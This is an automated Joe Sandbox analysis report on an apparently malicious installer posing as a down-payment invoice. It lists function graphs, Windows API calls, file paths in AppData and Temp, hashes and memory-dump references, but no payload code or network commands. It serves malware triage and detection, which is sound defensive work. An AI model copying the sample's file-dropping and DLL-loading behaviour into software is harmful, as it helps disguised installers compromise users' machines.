                                                                                                                                                                                                                      Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 788 40640a-406415 789 406417-406426 788->789 790 406428-40643e 788->790 789->790 791 406444-406451 790->791 792 406656-40665c 790->792 791->792 795 406457-40645e 791->795 793 406662-40666d 792->793 794 406463-406470 792->794 796 406678-406679 793->796 797 40666f-406673 call 4063e8 793->797 794->793 798 406476-406482 794->798 795->792 797->796 800 406643 798->800 801 406488-4064c6 798->801 804 406651-406654 800->804 805 406645-40664f 800->805 802 4065e6-4065ea 801->802 803 4064cc-4064d7 801->803 808 4065ec-4065f2 802->808 809 40661d-406621 802->809 806 4064f0 803->806 807 4064d9-4064de 803->807 804->792 805->792 813 4064f7-4064fe 806->813 807->806 810 4064e0-4064e3 807->810 811 406602-40660e call 4063e8 808->811 812 4065f4-406600 call 40632f 808->812 814 406630-406641 lstrlenW 809->814 815 406623-40662b call 40640a 809->815 810->806 816 4064e5-4064e8 810->816 826 406613-406619 811->826 812->826 818 406500-406502 813->818 819 406503-406505 813->819 814->792 815->814 816->806 822 4064ea-4064ee 816->822 818->819 824 406540-406543 819->824 825 406507-40652e call 4062b6 819->825 822->813 827 406553-406556 824->827 828 406545-406551 GetSystemDirectoryW 824->828 838 406534-40653b call 40640a 825->838 839 4065ce-4065d1 825->839 826->814 830 40661b 826->830 832 4065c1-4065c3 827->832 833 406558-406566 GetWindowsDirectoryW 827->833 831 4065c5-4065c9 828->831 835 4065de-4065e4 call 40667c 830->835 831->835 840 4065cb 831->840 832->831 837 406568-406572 832->837 833->832 835->814 842 406574-406577 837->842 843 40658c-4065a2 SHGetSpecialFolderLocation 837->843 838->831 839->835 845 4065d3-4065d9 lstrcatW 839->845 840->839 842->843 846 406579-406580 842->846 847 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 843->847 848 4065bd 843->848 845->835 850 406588-40658a 846->850 847->831 847->848 848->832 850->831 850->843
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                      • API String ID: 717251189-1230650788
                                                                                                                                                                                                                      • Opcode ID: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                                                      • Instruction ID: cc84c68a284476d24e00a3f01d451b35d35df0cd5868c7a223589be4a576710b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7612371A00111ABDF209F64DD41AAE37A5AF50314F62813FE903B62D0E73E9AA2C75D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
                                                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences$C:\Users\user\AppData\Local\Temp\nskD796.tmp$C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll$Call
                                                                                                                                                                                                                      • API String ID: 1941528284-91660701
                                                                                                                                                                                                                      • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                                                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 926 4027dc-4027e4 924->926 927 40267e-40268d call 406348 924->927 926->920 927->926 930 402693 927->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 934 402737-40273a 932->934 935 40274d-40275d call 405f61 932->935 933->926 936 4026c4-4026c9 933->936 934->935 937 40273c-402747 call 405fbf 934->937 935->926 945 40275f 935->945 936->926 939 4026cf-4026dd 936->939 937->926 937->935 940 4026e3-4026f5 MultiByteToWideChar 939->940 941 402798-4027a4 call 40632f 939->941 944 4026f7-4026fa 940->944 940->945 941->922 948 4026fc-402707 944->948 950 402762-402765 945->950 948->950 951 402709-40272e SetFilePointer MultiByteToWideChar 948->951 950->941 952 402767-40276c 950->952 951->948 955 402730 951->955 953 4027a9-4027ad 952->953 954 40276e-402773 952->954 957 4027ca-4027d6 SetFilePointer 953->957 958 4027af-4027b3 953->958 954->953 956 402775-402788 954->956 955->945 956->926 959 40278a-402790 956->959 957->926 960 4027b5-4027b9 958->960 961 4027bb-4027c8 958->961 959->931 962 402796 959->962 960->957 960->961 961->926 962->926
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                                                      • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                                                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 970 40591f-40596a CreateDirectoryW 971 405970-40597d GetLastError 970->971 972 40596c-40596e 970->972 973 405997-405999 971->973 974 40597f-405993 SetFileSecurityW 971->974 972->973 974->972 975 405995 GetLastError 974->975 975->973
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                      • API String ID: 3449924974-3370423016
                                                                                                                                                                                                                      • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                                                                                      • Instruction ID: 649461beb8834c01a631d5941a9b92c7b7a92d05cb5a935181bdf460574ff338
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF011AB1C10619DADF009FA5C944BEFBFB4EF14354F00403AE545B6291DB789608CFA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 976 405f0d-405f19 977 405f1a-405f4e GetTickCount GetTempFileNameW 976->977 978 405f50-405f52 977->978 979 405f5d-405f5f 977->979 978->977 980 405f54 978->980 981 405f57-405f5a 979->981 980->981
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF), ref: 00405F46
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00405F0D
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16
                                                                                                                                                                                                                      • nsa, xrefs: 00405F1A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                      • API String ID: 1716503409-2701785022
                                                                                                                                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 982 6f1d177b-6f1d17ba call 6f1d1b63 986 6f1d18da-6f1d18dc 982->986 987 6f1d17c0-6f1d17c4 982->987 988 6f1d17cd-6f1d17da call 6f1d2398 987->988 989 6f1d17c6-6f1d17cc call 6f1d2356 987->989 994 6f1d17dc-6f1d17e1 988->994 995 6f1d180a-6f1d1811 988->995 989->988 998 6f1d17fc-6f1d17ff 994->998 999 6f1d17e3-6f1d17e4 994->999 996 6f1d1831-6f1d1835 995->996 997 6f1d1813-6f1d182f call 6f1d256d call 6f1d15b4 call 6f1d1272 GlobalFree 995->997 1003 6f1d1837-6f1d1880 call 6f1d15c6 call 6f1d256d 996->1003 1004 6f1d1882-6f1d1888 call 6f1d256d 996->1004 1019 6f1d1889-6f1d188d 997->1019 998->995 1005 6f1d1801-6f1d1802 call 6f1d2d2f 998->1005 1001 6f1d17ec-6f1d17ed call 6f1d2a74 999->1001 1002 6f1d17e6-6f1d17e7 999->1002 1014 6f1d17f2 1001->1014 1007 6f1d17e9-6f1d17ea 1002->1007 1008 6f1d17f4-6f1d17fa call 6f1d2728 1002->1008 1003->1019 1004->1019 1017 6f1d1807 1005->1017 1007->995 1007->1001 1023 6f1d1809 1008->1023 1014->1017 1017->1023 1024 6f1d188f-6f1d189d call 6f1d2530 1019->1024 1025 6f1d18ca-6f1d18d1 1019->1025 1023->995 1032 6f1d189f-6f1d18a2 1024->1032 1033 6f1d18b5-6f1d18bc 1024->1033 1025->986 1030 6f1d18d3-6f1d18d4 GlobalFree 1025->1030 1030->986 1032->1033 1034 6f1d18a4-6f1d18ac 1032->1034 1033->1025 1035 6f1d18be-6f1d18c9 call 6f1d153d 1033->1035 1034->1033 1036 6f1d18ae-6f1d18af FreeLibrary 1034->1036 1035->1025 1036->1033
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DB6
                                                                                                                                                                                                                        • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DBB
                                                                                                                                                                                                                        • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DC0
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D1829
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6F1D18AF
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D18D4
                                                                                                                                                                                                                        • Part of subcall function 6F1D2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6F1D2387
                                                                                                                                                                                                                        • Part of subcall function 6F1D2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F1D17FA,00000000), ref: 6F1D27F8
                                                                                                                                                                                                                        • Part of subcall function 6F1D15C6: lstrcpyW.KERNEL32(?,6F1D4020), ref: 6F1D15DC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                      • Opcode ID: 4a4177f0cfd93771cde9571277633078264a90cd98c48bbc9c9ceb04e0b4c611
